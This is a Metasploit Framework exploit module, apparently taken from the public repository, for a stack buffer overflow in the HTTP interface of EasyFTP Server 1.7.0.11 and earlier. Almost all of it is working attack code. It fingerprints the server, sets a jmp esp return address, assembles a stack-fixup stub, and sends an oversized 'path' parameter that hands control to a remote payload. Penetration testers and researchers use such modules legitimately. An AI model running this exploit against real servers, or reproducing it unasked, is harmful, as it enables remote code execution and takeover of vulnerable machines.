GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/easyftp_list.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for the stack-based buffer overflow in EasyFTP Server's
  # HTTP interface (the 'path' query parameter of /list.html); affected
  # versions are given in 'Description' below.
  Rank = GreatRanking

  # Server banner pattern used for HTTP fingerprinting. #check below tests
  # the same pattern explicitly against the fetched banner.
  HttpFingerprint = { :pattern => [ /Easy-Web Server\// ] }

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata (name, references, payload constraints,
  # single target) and the HTTP basic-auth credential options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'EasyFTP Server list.html path Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11
          and earlier. EasyFTP fails to check input size when parsing the 'path' parameter
          supplied to an HTTP GET request, which leads to a stack based buffer overflow.
          EasyFTP allows anonymous access by default; valid credentials are typically
          unnecessary to exploit this vulnerability.

          After version 1.7.0.12, this package was renamed "UplusFtp".

          Due to limited space, as well as difficulties using an egghunter, the use of
          staged, ORD, and/or shell payloads is recommended.
        },
        'Author' => [
          'ThE g0bL!N', # Original exploit [see References]
          'jduck' # Metasploit re-implementation
        ],
        'References' => [
          [ 'CVE', '2010-20113' ],
          [ 'OSVDB', '66614'],
          [ 'EDB', '11500' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Privileged' => true,
        'Payload' => {
          # Only 256 bytes of the buffer are available to the encoded payload;
          # #exploit refuses to run with anything larger.
          'Space' => 256,
          # Excluded bytes: NUL, whitespace/control characters and URL
          # delimiters (# % & + / ; ? \), since the payload is carried in the
          # request's query string.
          'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2b\x2f\x3b\x3f\x5c",
          'Compat' =>
          {
            'ConnectionType' => '+ws2ord',
          },
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows XP SP3 - Easy FTP Server Universal',
            # NOTE: It's not possible to use addresses within the
            # binary due to the nul byte.
            {
              'Ret' => 0x7cc5d507 # jmp esp in shell32.dll
              # 'Ret' => 0xdeadbeef
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2010-02-18',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Credentials sent via HTTP basic auth; the defaults match the
    # anonymous access described above.
    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('HttpUsername', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),
        # NOTE(review): this default looks like a renderer-mangled e-mail
        # address; verify the value against the upstream module.
        OptString.new('HttpPassword', [true, 'The HTTP password to specify for basic authentication', '[email protected]'])
      ]
    )
  end

  # Reports Detected when the HTTP banner matches the Easy-Web Server
  # pattern, Safe otherwise.
  #
  # @return [Exploit::CheckCode] Detected or Safe
  def check
    info = http_fingerprint # check method; may be nil when no banner was obtained
    if info and (info =~ /Easy\-Web Server\//)
      return Exploit::CheckCode::Detected
    end

    # NOTE(review): a missing banner (e.g. no response at all) is reported as
    # Safe rather than Unknown; confirm that is the intended outcome.
    Exploit::CheckCode::Safe
  end

  # Sends one HTTP GET whose 'path' value overflows the stack buffer, then
  # hands control to the payload handler.
  #
  # Calls fail_with (Failure::Unknown) when the encoded payload exceeds the
  # declared payload space.
  def exploit
    # Refuse to proceed rather than send a buffer the payload does not fit in.
    if (payload.encoded.length > payload_space)
      fail_with(Failure::Unknown, "Insufficient space for payload, try using a staged, ORD and/or shell payload.")
    end

    # Fix up ESP, jmp to the beginning of the buffer
    stub_asm = %q{
      mov edi, esp
      add esp, 0xfffffc04
      add edi, 0xfffffee8
      jmp edi
    }
    # Assembled at runtime with Metasm instead of hard-coding the bytes.
    stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub_asm).encode_string

    # Build the path up. The cumulative lengths 268, 280 and 332 fix the
    # layout; rand_text fills each gap, and target.ret is written as a
    # 4-byte little-endian value (pack 'V').
    path = ''
    path << payload.encoded
    path << rand_text(268 - path.length)
    # NOTE: It's possible to overwrite SEH, however SafeSEH is in effect.
    path << [target.ret].pack('V')
    path << rand_text(280 - path.length)
    path << stub
    path << rand_text(332 - path.length)

    uri = "/list.html?path="
    uri << path

    print_status("Trying target #{target.name}...")
    # Second argument is the response timeout in seconds; a successful
    # overflow is not expected to produce a reply.
    res = send_request_raw({ 'uri' => uri }, 5)

    # Any response means the server handled the request normally, i.e. the
    # overflow did not take effect; dump the response for diagnosis.
    if (res)
      print_error("The server unexpectedly responded, this is not good.")
      print_status(res.to_s)
    end

    handler
  end
end